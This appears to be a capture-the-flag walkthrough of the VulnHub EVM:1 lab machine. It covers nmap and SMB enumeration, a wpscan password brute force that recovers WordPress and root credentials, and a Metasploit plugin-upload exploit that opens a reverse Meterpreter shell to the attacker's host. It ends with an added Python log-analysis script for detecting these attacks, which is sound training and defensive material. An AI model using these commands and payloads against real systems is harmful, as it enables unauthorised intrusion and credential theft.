https://www.vulnhub.com/entry/evm-1,391/
Reconnaissance
1. Discovery
└─$ sudo nmap -sn 192.168.45.0/24 -oA ./recon/targetSubScan
Nmap scan report for 192.168.45.174
Host is up (0.00027s latency).
MAC Address: 08:00:27:C6:8A:38 (Oracle VirtualBox virtual NIC)
2. Port Scanning
Full port scan
3. SMB
Check for null sessions and anonymous sessions
using enum4linux
I found a username
not interesting
4. HTTP(WEB)
The Apache2 default "It works" page comes up.
Page source:
robots.txt has nothing particularly interesting, but in the middle of the website it says that if you go to /wordpress you can find a vulnerable web app.
So WordPress is expected to be set up there.
I obtained user information, and since there is nothing else notable, I'll move on to vulnerability analysis.
# wordpress username
c0rrupt3d_brain
Vulnerability
Use the wpscan tool to identify which vulnerabilities exist in the WordPress installation.
└─$ wpscan --url http://192.168.45.174/wordpress/ --enumerate
Run a password brute-force attack against the c0rrupt3d_brain user.
└─$ wpscan --url http://192.168.45.174/wordpress/ -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt
Found one!!
# wordpress credentials
c0rrupt3d_brain:24992499
Exploitation
Since most of the web pages are not routed and cannot be reached, I carry out the exploit using Metasploit.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 192.168.45.219:4444
[*] Authenticating with WordPress using c0rrupt3d_brain:24992499...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/PlEBCILsug/KmIUSyQktT.php...
[*] Sending stage (39927 bytes) to 192.168.45.174
[+] Deleted KmIUSyQktT.php
[+] Deleted PlEBCILsug.php
[+] Deleted ../PlEBCILsug
[*] Meterpreter session 2 opened (192.168.45.219:4444 -> 192.168.45.174:37076) at 2024-07-12 17:36:23 +0900
meterpreter > shell
Process 2505 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id; hostname; ip a
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ubuntu-extermely-vulnerable-m4ch1ine
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:c6:8a:38 brd ff:ff:ff:ff:ff:ff
inet 192.168.45.174/24 brd 192.168.45.255 scope global enp0s3
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fec6:8a38/64 scope link
valid_lft forever preferred_lft forever
3: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default qlen 1000
link/ether 52:54:00:c5:7d:1b brd ff:ff:ff:ff:ff:ff
inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
valid_lft forever preferred_lft forever
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast master virbr0 state DOWN group default qlen 1000
link/ether 52:54:00:c5:7d:1b brd ff:ff:ff:ff:ff:ff
Initial foothold on the target host complete.
I obtained the wp-config.php file and took over the database.
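From the defender's side, both phases shown above (the wpscan password brute force against wp-login.php and the Metasploit plugin upload that dropped a PHP payload under wp-content/plugins/) leave a clear trail in the web server's access log. The following script is an added example, not part of the original walkthrough or of any tool used in it. It parses Apache combined-format log lines, flags a source IP that produces many failed wp-login.php POSTs in a short window, and flags a plugin upload followed shortly by a direct request to a PHP file inside wp-content/plugins/. Assumptions: WordPress answers a failed login with HTTP 200 (the form again) and a successful one with a 302 redirect; the plugin-upload endpoint is wp-admin/update.php?action=upload-plugin; the log lines themselves are constructed, reusing the IPs and paths that appear in the post.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A PHP file requested directly from a plugin directory (plugins are normally
# included by WordPress, not requested by the browser), e.g. the msf payload path.
PLUGIN_PHP_RE = re.compile(r"/wp-content/plugins/[^/]+/[^/?]+\.php")

ATTACKER = "192.168.45.219"  # IP from the walkthrough; log lines are constructed


def _line(ip, ts, method, path, status, ua):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 1234 "-" "{ua}"'


# Constructed sample log: one benign visitor, 12 failed wpscan logins in 12 seconds,
# one success (302), then a plugin upload followed by a request to the dropped PHP file.
SAMPLE_LOG = "\n".join(
    [_line("192.168.45.10", "12/Jul/2024:17:29:50 +0900", "GET", "/wordpress/", 200, "Mozilla/5.0")]
    + [_line(ATTACKER, f"12/Jul/2024:17:30:{s:02d} +0900", "POST", "/wordpress/wp-login.php", 200, "WPScan")
       for s in range(2, 14)]
    + [
        _line(ATTACKER, "12/Jul/2024:17:30:14 +0900", "POST", "/wordpress/wp-login.php", 302, "WPScan"),
        _line(ATTACKER, "12/Jul/2024:17:36:20 +0900", "POST",
              "/wordpress/wp-admin/update.php?action=upload-plugin", 200, "Mozilla/5.0"),
        _line(ATTACKER, "12/Jul/2024:17:36:22 +0900", "GET",
              "/wordpress/wp-content/plugins/PlEBCILsug/KmIUSyQktT.php", 200, "Mozilla/5.0"),
        _line("192.168.45.10", "12/Jul/2024:17:40:00 +0900", "GET",
              "/wordpress/wp-content/plugins/akismet/css/banner.css", 200, "Mozilla/5.0"),
    ]
)


def parse_log(text):
    """Parse combined-format lines into dicts; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["status"] = int(e["status"])
        events.append(e)
    return events


def detect_login_bruteforce(events, threshold=10, window=timedelta(minutes=5)):
    """Flag IPs with >= threshold failed wp-login.php POSTs inside a sliding window.
    Assumption: status 200 on the POST is a failed login, 302 a successful one."""
    failures = defaultdict(list)
    for e in events:
        if e["method"] == "POST" and e["path"].endswith("/wp-login.php") and e["status"] == 200:
            failures[e["ip"]].append(e["ts"])
    findings = []
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                findings.append({"kind": "wp-login brute force", "ip": ip, "failed_logins": len(times)})
                break
    return findings


def detect_plugin_shell_upload(events, window=timedelta(minutes=2)):
    """Flag a plugin upload followed, from the same IP and within `window`, by a direct
    request to a PHP file under wp-content/plugins/ (the pattern of a web-shell plugin)."""
    uploads = [e for e in events
               if e["method"] == "POST" and "/wp-admin/update.php" in e["path"]
               and "action=upload-plugin" in e["path"]]
    findings = []
    for up in uploads:
        for e in events:
            if e["ip"] == up["ip"] and up["ts"] <= e["ts"] <= up["ts"] + window \
                    and PLUGIN_PHP_RE.search(e["path"]):
                findings.append({"kind": "plugin upload + direct PHP request",
                                 "ip": e["ip"], "path": e["path"], "at": e["ts"].isoformat()})
    return findings


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for f in detect_login_bruteforce(evs) + detect_plugin_shell_upload(evs):
        print(f)
```

Both checks are heuristics meant for triage rather than proof: rate-limiting or locking wp-login.php and disabling plugin installation from the dashboard (DISALLOW_FILE_MODS) remove the two conditions they look for.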
Privilege Escalation
# credentials
root:willy26
Ea... easy.. heh